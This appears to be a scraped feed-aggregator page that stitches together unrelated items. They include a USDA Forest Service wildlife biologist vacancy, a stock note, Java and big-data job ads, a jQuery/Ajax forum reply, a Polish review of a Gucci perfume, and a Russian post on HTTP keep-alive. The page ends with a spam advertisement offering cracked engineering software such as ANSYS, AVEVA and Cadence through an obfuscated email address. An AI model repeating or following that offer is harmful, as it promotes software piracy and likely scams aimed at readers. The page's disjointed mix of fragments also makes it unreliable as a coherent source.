http://www.opm.gov/qualifications/policy/ApplicationOfStds-04.asp). The education must have been obtained in an accredited college or university and demonstrate the knowledge, skills, and abilities necessary to do the work. Specialized experience at the GS-05 level is defined as: * assisting with the collection of field data on wildlife habitats and vegetation; * interpreting aerial photos to determine vegetation types; * assembling biological and vegetation use data from records to determine past wildlife and livestock use; * assisting with the classification and evaluation of vegetation and soil to determine suitable habitats and ranges for wildlife. **GS-09: **In addition to the requirements described above, the following education and/or experience are required for the GS-09 level: One year or more of specialized experience equivalent to at least the GS-07 grade level; **OR** Masters or equivalent graduate degree or 2 full years of progressively higher level graduate education leading to such a degree; **OR** An appropriate combination of specialized experience and education (only graduate education in excess of 18 semester hours may be used to qualify applicants for this grade level). The education must have been obtained in an accredited college or university and demonstrate the knowledge, skills, and abilities necessary to do the work Specialized experience at the GS-07 level is defined as: * performing qualitative and quantitative analyses of wildlife resources; * conducting surveys and drafting tentative professional opinions to assist in determining wildlife resource needs and remedies; * assisting in carrying out a range of analytical/scientific assignments in the wildlife biology profession that included researching and analyzing data, issues, and information that support wildlife project recommendations. To receive consideration for this position, you must meet all qualification requirements by the closing date of the announcement. **TIME IN GRADE REQUIREMENT**: If you are a current federal employee in the General Schedule (GS) pay plan and applying for a promotion opportunity, you must meet time-in-grade (TIG) requirements of 52 weeks of service at the next lower grade level in the normal line of progression for the position being filled. This requirement must be met by the closing date of this announcement. ### Education ### Additional information BACKGROUND INVESTIGATION AND FINGERPRINT CHECK: Selection and retention in this position is contingent on a successfully adjudicated FBI National Criminal History Check (fingerprint check) and a background investigation. Career Transition Assistance Plan (CTAP), Reemployment Priority List (RPL) or Interagency Career Transition Assistance Plan (ICTAP): To exercise selection priority for this vacancy, CTAP/RPL/ICTAP candidates must meet the basic eligibility requirements and all selective factors. CTAP/ICTAP candidates must be rated and determined to be well qualified (or above) based on an evaluation of the competencies listed in the How You Will Be Evaluated section. When assessed through a score-based category rating method, CTAP/ICTAP applicants must receive a rating of at least 85 out of a possible 100. Bargaining Unit Status: Eligible - Coverage is dependent upon unit location. Bargaining units are represented by NFFE- IAMAW or AFGE. Forest Service daycare facilities or government housing is not available. Direct Deposit - Per Public Law 104-134 all Federal employees are required to have federal payments made by direct deposit to a financial institution of your choosing. E-Verify: Federal law requires agencies to use the E-Verify system to confirm the employment eligibility of all new hires. If you are selected as a newly hired employee, the documentation you present for purposes of completing the Department of Homeland Security (DHS) Form I-9 on your entry-on-duty date will be verified through the DHS E-VERIFY system. Under the system, the new hire is required to resolve any identified discrepancies as a condition of continued employment. Farm Service Agency (FSA) County Employees: Permanent County employees without prior Federal tenure who are selected for a Civil Service position under Public Law 105-277 will be given a career- conditional appointment and must serve a 1-year probationary period. Land Management Workforce Flexibility Act (LMWFA) provides current or former temporary or term employees of federal land management agencies opportunity to compete for permanent competitive service positions. Individuals must have more than 24 months of service without a break between appointments of two or more years. Service must be in the competitive service and have been at a successful level of performance or better. For more information on applying under special hiring authorities, explore the different Hiring Paths on the USAJOBS website. This position is eligible for telework and other flexible work arrangements. Veterans who are preference eligible or who have been separated from the armed forces under honorable conditions after three years or more of continuous active service are eligible for consideration under the Veteran's Employment Opportunity Act (VEOA). Read more ### How You Will Be Evaluated You will be evaluated for this job based on how well you meet the qualifications above. You will be evaluated based on your qualifications for this position as evidenced by the experience, education, and training you described in your application package, as well as the responses to the Assessment Questionnaire to determine the degree to which you possess the knowledge, skills, abilities and competencies listed below GS-5: * **Knowledge of wildlife biology to manage and evaluate wildlife resources studies, investigations, or projects.** * **Ability to communicate effective in writing.** * **Ability to communicate effective other than in writing.** GS-7: * **Knowledge of wildlife biology to manage and evaluate wildlife resources studies, investigations, or projects.** * **Ability to analyze wildlife management issues and problems.** * **Ability to communicate effective in writing.** * **Ability to communicate effective other than in writing.** GS-9: * **Knowledge of wildlife biology to manage and evaluate wildlife resources studies, investigations, or projects.** * **Ability to analyze wildlife management issues and problems.** * **Ability to perform program management and oversight functions related to the wildlife resource.** * **Ability to communicate effective in writing.** * **Ability to communicate effective other than in writing.** Note: If, after reviewing your resume and/or supporting documentation, a determination is made that you have inflated your qualifications and or experience, your rating may be lowered to more accurately reflect the submitted documentation. Please follow all instructions carefully. Errors or omissions may affect your rating. Providing inaccurate information on Federal documents could be grounds for non-selection disciplinary action up to including removal from the Federal service. Clicking the link below will present a preview of the application form; i.e. the online questionnaire. The application form link below will only provide a preview and does not initiate the application process. To initiate the online application process, click the "Apply" button to the right. Your application, including the online Assessment Questionnaire, will be reviewed to determine if you meet (a) minimum qualification requirements and (b) the resume supports the answers provided to the job-specific questions. Your resume must clearly support your responses to all the questions addressing experience and education relevant to this position. Applicants who meet the minimum qualification requirements and are determined to be among the best qualified candidates will be referred to the hiring manager for consideration. Noncompetitive candidates and applicants under some special hiring authorities need to meet minimum qualifications to be referred. To view the application form, visit: https://fs.usda.ntis.gov/cp/?event=jobs.previewApplication&jobid;=33F734A1-8975-41D4-B405-A93400EDDF6A Read more ### Background checks and security clearance ##### Security clearance Not Applicable * Required Documents Help ## Required Documents The following documents are required for your applicant package to be complete. Our office cannot be responsible for incompatible software, illegible fax transmissions, delays in the mail service, your system failure, etc. Encrypted documents will not be accepted. Failure to submit required, legible documents may result in loss of consideration. * Resume that includes: 1) personal information such as name, address, contact information; 2) education; 3) detailed work experience related to this position as described in the major duties including work schedule, hours worked per week, dates of employment; title, series, grade (if applicable); 4) supervisor’s phone number and whether or not the supervisor may be contacted for a reference check; 5) other qualifications. * If education is required or you are using education to qualify, you must submit: a copy of your college transcripts. An unofficial copy is sufficient with the application; however, if you are selected, you will be required to submit official transcripts prior to entering on duty. Education must have been successfully obtained from an accredited school, college or university. If any education was completed at a foreign institute, you must submit with your application evidence that the institute was appropriately accredited by an accrediting body recognized by the U.S. Department of Education as equivalent to U.S. education standards. There are private organizations that specialize in this evaluation and a fee is normally associated with this service. All transcripts must be in English or include an English translation. In addition to the above, you must submit the documents below if you claim any of the following: * Current Federal employees: 1) Most recent non-award Notification of Personnel Action (SF-50) showing that you are/were in the competitive service, highest grade (or promotion potential) held on a permanent basis, position title, series and grade **AND** 2) Most recent performance appraisal (dated within 18 months) showing the official rating of record, signed by a supervisor, or statement why the performance appraisal is unavailable. Do not submit a performance plan. * Surplus or displaced employees eligible for CTAP, RPL, or ICTAP priority: proof of eligibility (RIF separation notice, notice of proposed removal for declining a transfer of function or directed reassignment to another commuting area, notice of disability annuity termination), SF-50 documenting separation (as applicable), and your most recent SF-50 noting position, grade level, and duty location with your application per 5 CFR 330. * Land Management Workforce Flexibility Act Eligible Applicants: Notification of Personnel Actions (SF-50s) showing you have served in appropriate appointment(s) for a period/periods that total more than 24 months without a break in service of two or more years. You must include the initial hire actions, extensions, conversions and termination/separation SF-50s for each period of work; **AND** Performance Rating(s) or other evidence showing acceptable performance for ALL periods counted toward the more than 24 months of service. You must provide: 1) Performance Rating(s) showing an acceptable level of performance for period(s) of employment counted towards your eligibility, signed by your supervisor(s); or 2) If documentation of a rating does not exist for one or more periods, a statement from your supervisor(s) or other individual in the chain of command indicating an acceptable level of performance for the period(s) of employment counted towards your eligibility; or 3) If you do not have a Performance Rating or other performance documentation (outlined in 1 and 2 above) for any period that you are using to qualify for eligibility under the LMWFA, you must provide: A stated reason as to why the appraisal/documentation is not available, and a statement that your performance for all periods was at an acceptable level, your most recent separation was for reasons other than misconduct or performance, and you were never notified that you were not eligible for rehire based on performance. (This shall be accepted in lieu of providing copies of the performance appraisals). * Current permanent FSA County employees: most recent non-award Notification of Personnel Action, (SF-50 or equivalent) showing your highest grade (or promotion potential) held on a permanent basis, position title, series and grade AND most recent performance appraisal (dated within 18 months) per above. * VEOA, VRA and 30% Disabled Veterans: please review the Required Documents for Hiring Authorities Quick Guide on the Forest Service website. * If claiming eligibility under a special hiring authority not listed above, please review the Required Documents for Hiring Authorities Quick Guide on the Forest Servicewebsite. #### If you are relying on your education to meet qualification requirements: Education must be accredited by an accrediting institution recognized by the U.S. Department of Education in order for it to be credited towards qualifications. Therefore, provide only the attendance and/or degrees from schools accredited by accrediting institutions recognized by the U.S. Department of Education. Failure to provide all of the required information as stated in this vacancy announcement may result in an ineligible rating or may affect the overall rating. * Benefits Help ## Benefits A career with the U.S. Government provides employees with a comprehensive benefits package. As a federal employee, you and your family will have access to a range of benefits that are designed to make your federal career very rewarding. Learn more about federal benefits. Eligibility for benefits depends on the type of position you hold and whether your position is full-time, part-time, or intermittent. Contact the hiring agency for more information on the specific benefits offered. * How to Apply Help ## How to Apply Please view Tips for Applicants– a guide to the Forest Service application process. Please read the entire announcement and all instructions before you begin. You must complete this application process and submit all required documents electronically by 11:59p.m. Eastern Time (ET) on the closing date of this announcement. Applying online is highly encouraged. We are available to assist you during business hours (normally 8:00a.m. - 4:00p.m., Monday - Friday). If applying online poses a hardship, contact the Agency Contact listed below well before the closing date for an alternate method. All hardship application packages must be complete and submitted no later than noon ET on the closing date of the announcement in order to be entered into the system prior to its closing. This agency provides reasonable accommodation to applicants with disabilities on a case-by-case basis; contact the Agency Contact to request this. To begin, click "Apply Online" and follow the instructions to complete the Assessment Questionnaire and attach your resume and all required documents. **NOTE:** You must verify that uploaded documents from USAJOBS transfer into the Agency's staffing system. Applicants may combine all like required documents (e.g., all SF-50s) into one or more files and scan for uploading into the application. Each file must not exceed 3MB. Grouping like documents into files will simplify the application process. Documents must be in one of the following formats: GIF, JPEG, JPG, PDF, PNG, RTF, or Word (DOC or DOCX). Uploaded documents may not require a password, digital signature, or other encryption to open. Read more ### Agency contact information ### HRM Contact Center ##### Phone 877-372-7248, option 2 ##### TDD 800-877-8339 ##### Fax 877-339-0719 ##### Email fsjobs@fs.fed.us ##### Address USDA Forest Service Do not mail applications, see instructions under How to Apply tab. Albuquerque, NM, 87109 United States Learn more about this agency ### Next steps Your application will be reviewed to verify that you meet the eligibility and qualification requirements for the position prior to issuing referral lists to the selecting official. If further evaluation or interviews are required, you will be contacted. Log in to your USAJOBS account to check your application status. We expect to make a final job offer approximately 40 days after the deadline for applications. Multiple positions may be filled from this announcement. Read more * Fair & Transparent ## Fair & Transparent The Federal hiring process is setup to be fair and transparent. Please read the following guidance. ### Equal Employment Opportunity Policy The United States Government does not discriminate in employment on the basis of race, color, religion, sex (including pregnancy and gender identity), national origin, political affiliation, sexual orientation, marital status, disability, genetic information, age, membership in an employee organization, retaliation, parental status, military service, or other non-merit factor. * Equal Employment Opportunity (EEO) for federal employees & job applicants Read more ### Reasonable Accommodation Policy Federal agencies must provide reasonable accommodation to applicants with disabilities where appropriate. Applicants requiring reasonable accommodation for any part of the application process should follow the instructions in the job opportunity announcement. For any part of the remaining hiring process, applicants should contact the hiring agency directly. Determinations on requests for reasonable accommodation will be made on a case-by-case basis. A reasonable accommodation is any change to a job, the work environment, or the way things are usually done that enables an individual with a disability to apply for a job, perform job duties or receive equal access to job benefits. Under the Rehabilitation Act of 1973, federal agencies must provide reasonable accommodations when: * An applicant with a disability needs an accommodation to have an equal opportunity to apply for a job. * An employee with a disability needs an accommodation to perform the essential job duties or to gain access to the workplace. * An employee with a disability needs an accommodation to receive equal access to benefits, such as details, training, and office-sponsored events. You can request a reasonable accommodation at any time during the application or hiring process or while on the job. Requests are considered on a case-by-case basis. Learn more about disability employment and reasonable accommodations or how to contact an agency. Read more #### Legal and regulatory guidance * Financial suitability * Social security number request * Privacy Act * Signature and false statements * Selective Service * New employee probationary period This job originated on www.usajobs.gov. For the full announcement and to apply, visit www.usajobs.gov/GetJob/ViewDetails/507189800. Only resumes submitted according to the instructions on the job announcement listed at www.usajobs.gov will be considered. *Open & closing dates:* 08/06/2018 to 08/20/2018 *Salary:* $33,394 to $65,778 per year *Pay scale & grade:* GS 05 - 09 *Work schedule:* Full-Time *Appointment type:* Permanent
          Bearish Moving Average Cross by Apache Corp (APA)      Cache   Translate Page   Web Page Cache   
Today, shares of Apache Corp (NYSE:APA) have fallen below their 10-day MA of $45.25 on a volume of 2.5 million shares. This may provide swing traders with an opportunity...
          Junior Java Developer      Cache   Translate Page   Web Page Cache   
Technical Skills The ideal candidate is expected to be technically strong in the following general areas: Core Java UNIX/Linux (command line and shell scripting) Continuous Integration with Jenkins or similar Good written and verbal communication The following technologies and activities represent the EPP settlement stack: experience in some or all may be an advantage. Use of any or all of these technologies may be required over time: REST APIs JSON Spring (core, integration, boot, batch and other libraries) Messaging middleware (Rabbit MQ) Hadoop stack (Hbase, Storm) Apache Kafka Apache HDFS Apache Spark Apache Parquet & Avro Zookeeper YARN Pivotal Cloud Foundry AWS development JBoss Drools Working in Agile projects Test Driven Development Secure Coding Practices Git/GitHub Gradle Application development and software engineering as part of an Agile scrum team. Provide specialised expertise and applied knowledge on aspects of EPP settlement application development. Work with tech leads to understand architecture direction and contribute to the creation of high level designs. Develop proof of concepts & critical software application components Collaborate with business partners to review requirements(agile features) Follow Agile and Scaled Agile software development methodologies Software development estimation QA team collaboration Software application third line production support Bachelor's degree Preferred 2 years software development experience Must possess the judgement to plan and accomplish goals with minimal supervision This position will require the candidate to perform a wide variety of tasks. A wide degree of creativity and flexibility with regard to technology is expected. This is for a large financial company, for more information or to apply please get in touch.
          Associate Java Developer      Cache   Translate Page   Web Page Cache   
Responsibilities:  Working in an Agile environment following SAFE and following Continuous Integration/Deployment practices  Develop and maintain Applications for the eWallets Program. o RESTful API based Applications (Java, Spring) o Batch applications (Spring Batch) o GUI Applications (JSF, Spring)  Interpreting and refining system and functional requirements  Writing technical design documentation (high and low level) as required  Estimation of development effort  Coding of the Applications following Quality process including Code Reviews, Sonarqube standards, writing Unit Test (Junit, Mocks), SIT tests, End-to-End Test as appropriate  Working with the eWallets QA group to ensure that the code meets the functional Test requirements  Working with eWallets QA group to perform load, performance and destructive testing  Writing and executing production and pre-production implementation plans  Providing level 3 production support for eWallets applications including out of hours support on a rota basis  Providing guidance and help to other team members. Requirements:  Bachelor's degree or equivalent experience  Minimum of 5 years software development experience  Has been involved in and implemented business critical projects of large scope and technical complexity.  Ability to prepare and communicate high level application designs and concepts to management and peers  Must possess the judgement to plan and accomplish goals with minimal supervision  This position will require the candidate to perform a wide variety of tasks. A wide degree of creativity and flexibility with regard to technology is expected. Expected to be strong in the following general areas:  Enterprise software development  Java SE, EE, REST APIs, TDD Experience with the following is an advantage:  Design patterns  Financial Services  Payments Industry and/or PCI compliance  SAFE, Agile methodology, Scrum  Continuous Integration/Delivery, Jenkins  Spring, Hibernate, JPA  Messaging: JMS, WMQ, SEDA, Rabbit  JSF, Primefaces, HTML, Ajax  Websphere Application Server, Tomcat  Oracle RDBMS  Apache Camel, Spring Integration  Unix/Linux, shell scripting  TCP/IP, Java NIO  Cloud: PCF for the company profile if the role looks of interest please apply
          Re : can jquery support a menu sending files to 3 different DIVs on the same page      Cache   Translate Page   Web Page Cache   
Well, I see one "wrong tree".

frames -> flexbox

Frames let you load different HTML documents into different "windows" on the same browser window/tab. Each frame acts like it is a separate browser tab/window. That is, you load complete HTML documents into each one, and they operate independently, each with their own scripts and CSS.

Flexbox is a detail of CSS layout. It helps you layout nice self-adjusting boxes.

You should be thinking frames -> Ajax.

Ajax lets you load content into different parts of your document.

You can use Ajax with or without Flexbox. One has nothing to do with the other.

    https://learn.jquery.com/ajax/

P.S. Normally, with Ajax, you will load HTML FRAGMENTS into parts of your document using Ajax. Not entire documents. (They should not have <head>, scripts, etc.)

As a KLUDGE, you can remove the parts that aren't needed (and that will cause trouble!) before inserting the HTML into parts of your document.

Do you use a server? Or do you just load files from your local filesystem? You should use a server, even if it's just one running on your desktop system. You will have problems implementing Ajax without a server. It does not have to be a fancy server - e.g. you do not need a fancy Apache server. 

P.P.S. If you are going to go gung-ho flexbox (and I think it's a good idea!) you should take a look at Bootstrap 4. It's a modern CSS (and Javascript) framework "lite" that uses flexbox and typographic (rather than pixel) sizing. You wouldn't have to write all that flexbox CSS. It has CSS classes that control all of the flex options, and it will take care of the browser differences for you. (You don't need to write -webkit-flex, -moz-flex, etc.)

https://getbootstrap.com/docs/4.1/getting-started/introduction/

I'll message you privately. I develop a very targeted piece of educational software (as an App). I use Bootstrap 4, Ajax, and Flexbox.

          Me trying to watch TV #kitten #cat #catsofinstagram #beautiful #love #pet #photooftheday #likemypet #kitty #feline #yourcatstoday #showcasingpets #petstagram #catlady #catlove #SiameseCat #seallynxpoint      Cache   Translate Page   Web Page Cache   

okieapache70 posted a photo:

Me trying to watch TV   #kitten #cat #catsofinstagram #beautiful #love #pet #photooftheday #likemypet #kitty #feline #yourcatstoday #showcasingpets #petstagram #catlady #catlove #SiameseCat #seallynxpoint


          微服务接口压力测试报错      Cache   Translate Page   Web Page Cache   
主要错误信息: com.netflix.zuul.exception.ZuulException: Filter threw Exception   Caused by: java.lang.reflect.UndeclaredThrowableException: null Caused by: org.apache.catalina.connector.ClientAbortException: java.io.IOException: 你的主机中的软件中止了一个已建立的连接。 springboot 采用 jar包启动...
          GUCCI, Bloom Acqua di Fiori      Cache   Translate Page   Web Page Cache   
Latem szukając wytchnienia od ciężkich klimatów sięgamy po lżejsze zapachy. Mam kilka swoich
wakacyjnych hitów, Gucci Bloom Acqua di Fiori to propozycja bardzo zielona, z lekką dozą pudrowości.



Gucci to jeden z największych domów mody na świecie, założony w 1921 roku we włoskiej 
Florencji. Marka znana jest ze swojej kreatywności, innowacyjności i niezrównanego włoskiego 
rzemiosła. W 1970 roku marka wkroczyła w świat zapachów, łącząc tradycje i nowoczesność,
tworzy zmysłowe, wyrafinowane i kuszące kompozycje. Te najbardziej znane to ponadczasowy i 
zmysłowy Eau De Parfum II, dziewczęcy i energiczny Rush 2 czy jakże zmysłowe Gucci Envy Me. 
Bardziej subtelne, ale i wyraziste kompozycje kwiatowe znajdziemy w kolekcji Flora. Pierwszy 
zapach Gucci pod nazwą Bloom powstał w 2017 roku, to powrót do włoskiej sztuki perfumiarskiej i 
do naturalnych kwiatów. Opisywany jako "elissir di fiore" czyli esencja kwiatowa - pełen finezji,
został nagrodzony tytułem: najlepszy zapach w plebiscycie ELLE INTERNATIONAL BEAUTY 
AWARDS 2018 organizowanym przez 46 krajów na świecie. Acqua di Fiori to ich zielona wariacja.
 
Nowa edycja Gucci Bloom jest owocem współpracy Alessandra Michele z mistrzem perfumiarstwa 
Albertem Morillasem. Można powiedzieć, że Panowie odświeżyli klasyka na rzecz zielonych tonów. 
W dalszym ciągu czuć tu nuty kwiatowe, intensywnie skoncentrowane składniki. Przypominające 
różnorodne aromaty kwitnącego ogrodu są doskonałym uzupełnieniem bazy. Bazę stanowią drzewo
sandałowe i piżmo,w celu emanowania ciepłem i głębią. Zapach otwiera się bardzo zielono, wręcz 
orzeźwiająco, nowy soczysty akord - intensywnie świeży, skomponowany z zielonego galbanum i 
delikatnych pąków czarnej porzeczki zaprasza nas do spaceru po ogrodzie. Po chwili piżmowe tony
 liści galbanum łagodzą pikanterię pąków porzeczki. W sercu czuć już wiązankę kwiatów, wyłaniają 
się charakterystyczne dla Gucci Bloom pąki jaśminu, nie za ciężkie, niczym powiewające na wietrze, 
pnącze Rangoon i tuberoza. Przepiękny bukiet, którego zmysłową głębię określa woń piżma i drewna
sandałowego o ciepłym i głębokim charakterze. Zapach jest orzeźwiajacy, w sam raz na wiosnę czy 
pełnię lata, lekki i przyjemny, aczkolwiek z wyrazem. Ta gra w zielone to nie murawa z trawy, ani 
kwiecisty, bujny wianek. Mieszanka wyjątkowa, niosąca silny przekaz, trwała. Zapach jest wręcz 
stworzony dla kobiet spontanicznych, radosnych, żywiołowych, lecz pełnych dziewczęcego uroku.


 

Flakon i opakowanie nawiązuje do Gucci Bloom, utrzymane w tonacji beżowej, ozdobiono dla 
wyróżnienia ekscentrycznym kwiatowym ornamentem zielnika w nowym zielonym odcieniu. Wzór 
liści, gałązek wiśni i kwiatów w stylu toile de Jouy - tkaniny zdobionej sielankowymi scenkami 
rodzajowymi -  umieszczono w czarnej ramce. Zielony kolor odzwierciedla nuty zapachowe oraz 
przesłanie zapachu mówiące o energii i świeżości. Kampania reklamowa Gucci Bloom Acqua di 
Fiori afirmuje witalność i młodzieńczą energię. Film został wyreżyserowany przez Glena Luchforda.
Ukazuje relacje przyjaciółek Domu Gucci: Dakoty Johnson, Hari Nef i Petry Collins opowiadających 
o ich szczególnej więzi. Dziewczyny rozkoszują się pięknem i bujnością natury, pływają o zmroku w
 migoczącym jeziorze, porośniętym kwiatami i szuwarami, otacza je zielona, pachnąca kaskada.

"Więzi rodzą się spontanicznie, wypełnione młodzieńczą radością, a kobiece przyjaźnie szybko stają 
się nierozerwalne i zdolne są przetrwać próbę czasu. O tych prawdziwych relacjach opowiada nowy 
rozdział historii marki Gucci Bloom. Nowy zapach - Gucci Bloom Acqua di Fiori afirmuje witalność 
oraz energię młodości i przyjaźni. Nowa wcielenie dobrze znanego zapachu - świeże i zielone, to 
kompozycja promienna i podnosząca na duchu, to zapach, który ukazuje piękno nieświadomej niewinności"


Choć Gucci Bloom Acqua di Fiori zachowuje kwiatowy akord Bloom, jest jednak zapachem o odrębnym i
oryginalnym. Jawi się świeży i jasnozielono, ale to co mnie w nim ujęło to szczypta piżma, które tak wielbię. 

                                           GUCCI, Bloom Acqua di Fiori 50 ml – 349 zł 
                                           GUCCI, Bloom Acqua di Fiori 100 ml – 465 zł
 

          Software Developer Search Algorithms *      Cache   Translate Page   Web Page Cache   
Software Developer Search Algorithms * - Citi

Software Developer Search Algorithms * Time to reboot? We are looking for enthusiastic team players who enjoy taking on responsibility and who take bold and thoughtful decisions. People who jump in at the deep end with passion. With over 1,500 employees and 5 million customers, the myToys Group is one of the most successful e-commerce companies in Germany and is part of the Otto Group. Software Developer Search Algorithms * As a Software Developer Search algorithms * you are involved in the development of our e-commerce platform and theoptimization of our search engine. You develop new components for text searchfunction and suggestion, as well as analytics and optimization tools. You arepassionate about search technologies and you have fun trying new stuff, such as Machine Learning or new search engines. In cooperation with our product owner and search team, you will make a significant contribution to the success of our shop development. Scrum is not just a slogan for us, but aliving reality. Our team plans and organizes its work autonomously. The Scrum Master and team leader see themselves as supporters and enablers of team requirements. We are currently in the process of setting up guilds in which ourdevelopers deal with team-overlapping topics such as architecture, codequality, testing and continuing professional development. Job requirements: A successfully completed Bachelor Degree in Software Engineering or a similar discipline Sound knowledge of Java (preferably the latest version) with several years of experience In-depth knowledge of Apache Solr or similar technologies Knowledge of script languages Familiar with search engines, text search function and suggestion Good knowledge of relational and non-relational databases You are familiar with the handling of QA measures such as unit tests, pair programming, code reviews and TDD Passion for clean code&rdquor; and quality standards Experience in the field of modern software architectures and agile development structures Commitment, good communication skills and the ability to work in a team We offer: An attractive, modernworkplace in the heart of Berlin A motivated team that welcomesinnovation Exciting tasks and a greatdeal of personal responsibility The daily opportunity todevelop your own strengths Individual developmentopportunities, room for new ideas and flat hierarchies Flexibl... Original job ad is published on StepStone.de - Set up a Jobagent at StepStone now and find your dream job! https://bit.ly/2KOagYD For similar jobs, information on employers and career tips visit StepStone.de!

    Uzņēmums: myToys.de GmbH
    Darba veids: Pilna laika

          Junior Software Engineer - Leidos - Morgantown, WV      Cache   Translate Page   Web Page Cache   
Familiarity with NoSql databases (Apache Accumulo, MongoDB, etc.). Leidos has job opening for a Junior Software Engineer in Morgantown, WV....
From Leidos - Wed, 25 Jul 2018 12:47:39 GMT - View all Morgantown, WV jobs
          TVS Apache RR310 Review – Versatility Meets Race Dynamics      Cache   Translate Page   Web Page Cache   

In 1987, TVS Racing came into existence with the objective of engineering the motorcycles for high-performance racing. In 1994 TVS Racing becomes the 1st Indian manufacturer to launch one make racing in the country. Today with 35 years of racing, TVS has been an unstoppable force in the world of Indian Motorsports and the culmination of it […]

Read the full article: TVS Apache RR310 Review – Versatility Meets Race Dynamics


          Valick написал(а) в теме: Длительное выполнение скрипта      Cache   Translate Page   Web Page Cache   
При работе по HTTP 1.1 все соединения считаются постоянными, если не обозначено иное.[1] При этом постоянные соединения не используют сообщения keepalive, а просто позволяют передачу многократных запросов в одном и том же соединении. Тем не менее, время ожидания по умолчанию в httpd для Apache 1.3[2] и 2.0[3] составляет всего 15 секунд, а для Apache 2.2[4] и 2.4[5] лишь 5 секунд. Преимуществом короткого таймаута является возможность быстро отдать клиенту несколько компонентов веб-страницы, не блокируя при этом слишком долго в состоянии ожидания процессы или потоки сервера.[6]

В вашем случае проще всего опрашивать по ajax сервер на предмет готовности файла. Ну и сам алгоритм формирования файла подозреваю далеко не идеальный, начиная с выборки из БД которая скорее всего использует запросы в цикле.
          Apache Corp. On Pace Largest Percent Decrease Since March 2016...      Cache   Translate Page   Web Page Cache   

Apache Corporation (APA) is currently at $42.39, down $3.74 or 8.11%

 

-- Would be lowest close since June 15, 2018 when it closed at $41.61

-- On pace for largest percent decrease since March 8, 2016 when it fell 9.51%

-- Earlier Thursday, Stifel Nicolaus raised...

          XAMPP 7.2.8-0      Cache   Translate Page   Web Page Cache   
A very easy to install Apache distribution for Linux, Solaris, and Windows. 2018-08-09
          Hadoop Developer with Java - Allyis Inc. - Seattle, WA      Cache   Translate Page   Web Page Cache   
Working knowledge of big data technologies such as Apache Flink, Nifi, Spark, Presto, Elastic Search, DynamoDB and other relational data stores....
From Dice - Sat, 28 Jul 2018 03:49:51 GMT - View all Seattle, WA jobs
          Sr Software Engineer - Hadoop / Spark Big Data - Uber - Seattle, WA      Cache   Translate Page   Web Page Cache   
Under the hood experience with open source big data analytics projects such as Apache Hadoop (HDFS and YARN), Spark, Hive, Parquet, Knox, Sentry, Presto is a...
From Uber - Sun, 13 May 2018 06:08:42 GMT - View all Seattle, WA jobs
          Software Development Engineer - Big Data Platform - Amazon.com - Seattle, WA      Cache   Translate Page   Web Page Cache   
Experience with Big Data technology like Apache Hadoop, NoSQL, Presto, etc. Amazon Web Services is seeking an outstanding Software Development Engineer to join...
From Amazon.com - Wed, 08 Aug 2018 19:26:05 GMT - View all Seattle, WA jobs
          Sr. Technical Account Manager - Amazon.com - Seattle, WA      Cache   Translate Page   Web Page Cache   
You can also run other popular distributed frameworks such as Apache Spark, Apache Flink, and Presto in Amazon EMR;...
From Amazon.com - Wed, 01 Aug 2018 01:21:56 GMT - View all Seattle, WA jobs
          HRS Hampson Russe v10.3      Cache   Translate Page   Web Page Cache   

crack software download CATENA.SIMetrix-SIMPLIS.8.0 DATEM Summit Evolution v6.8 GLOBE Claritas v6.6 Kepware v6.4
ttmeps#gmail.com ----- change "#" to "@"
Anything you need,You can also check here: ctrl + f

AMI.Vlaero.Plus.v2.3.0.10
2S.I. PRO_SAP RY2015b v15.0.1
Aquaveo Surface-water Modeling System Premium v11.2.12 Win64
Aquaveo.GMS.Premium.v10.0.11.Win64
Ashampoo.3D.CAD.Pro.v5.0.0.1
3DCS Variation Analyst MultiCAD v7.2.2.0 Win32_64
3DCS Variation Analyst v7.3.0.0 for CATIA V5 Win32_64
AGI.Systems.Tool.Kit(STK).v10.1.3
ANSYS Customization Tools (ACT) 16.0-16.1 Suite
ANSYS Electromagnetics Suite 16.2 Win64
Ansys Products v16.2 Win64Linux64
Ashampoo.3D.CAD.Architecture.5.v5.5.0.02.1
Ashampoo.3D.CAD.Professional.5.v5.5.0.01
Avenza Geographic Imager v5.0.0 for Adobe CS5-CC2015 Win32_64
Avenza MAPublisher v9.6.0 for Adobe CS5-CC2015 Win32_64
AVEVA.PDMS.V12.1 SP1
B&K Pulse v19.1
LEAP.Bridge.Steel.V8i.SS2.01.02.00.01
STAAD.Foundation.Advanced.V8i.SS3.07.02.00.00
BioSolveIT.SeeSAR.v3.2
AutoPIPE Vessel V8i SS1 v33.03.01.07
HAMMER V8i v08.11.06.58
WaterCAD & WaterGEMS V8i SS6 08.11.06.58
Cadence Allegro and OrCAD (Including ADW) v17.00.005
CadSoft.Computer.EAGLE.Professional.v7.3.0 x32x64
Carlson.Civil.Suite.2016.150731.Win32_64
Carlson.Precision.3D.2015.31933
CD-Adapco Star CCM+ 10.04.011 Win64Linu64
ClearTerra LocateXT ArcGIS for Server Tool 1.2 Win32_64
ClearTerra LocateXT Desktop 1.2 Win32_64
ClearTerra.LocateXT.ArcGIS.for.Server.Tool.v1.2.Win32_64
ClearTerra.LocateXT.Desktop.v1.2.Win32_64
CST Studio Suite 2015 +SP4
CD-ADAPCO.STAR-CCM.10.04.011-R8(double precision).Win64.&.Linux64
CES EduPack v2015
Schlumberger InSitu Pro 2.0
easycopy v8.7.8
Chasm.Ventsim.Visual.Premium.v4.0.6.1.Win32_64
Command.Digital.AutoHook.2016.v1.0.1.20
Corel.Corporation.CorelCAD.2015.v2015.5.Win32_64
Concept GateVision v5.9.7 Win&Linux
Crosslight.Apsys.2010.Win
Cmost Studio v2014
Delcam PowerMILL2Vericut v2016 Win64
Delcam PowerSHAPE 2016 Win64
DICAD.Strakon.Premium.v2015
DownStream Products v2015.6
DownStream Products v2015.8
DeskArtes.3Data.Expert.v10.2.1.7 x32x64
DeskArtes.Dimensions.Expert.v10.2.1.7.x32x64
DeskArtes.Sim.Expert.v10.2.1.7.x32x64
DriveWorks Pro 12.0 SP0
Kelton.Flocalc.Net v1.6.Win
Delcam.PowerINSPECT.2015.R2.SP1.Win32_64
DS DELMIA D5 V5-6R2014 GA
DAVID laserscanner 4.2.0.134 Pro
Elite.Software.Chvac.8.02.24.With.Drawing.Board.6.01
Elite.Software.Energy.Audit.7.02.113.Win
Elite.Software.Rhvac.9.01.157.With.Drawing.Board.6.01
PSS-ADEPT v5.0
ge interllution ifix v4.0
ESSCA OpenFlow v2012
Trimble RealWorks v6.5
ESRI CityEngine Advance 2015.1.2047 x64
Exelis ENVI v5.3,IDL v8.5,LiDAR v5.3 win64
EMIT.Maxwell.v5.9.1.20293
ESI PAM-FORM 2G v2013.0 Win
FEI.Amira.v6.0.1.Win32_64
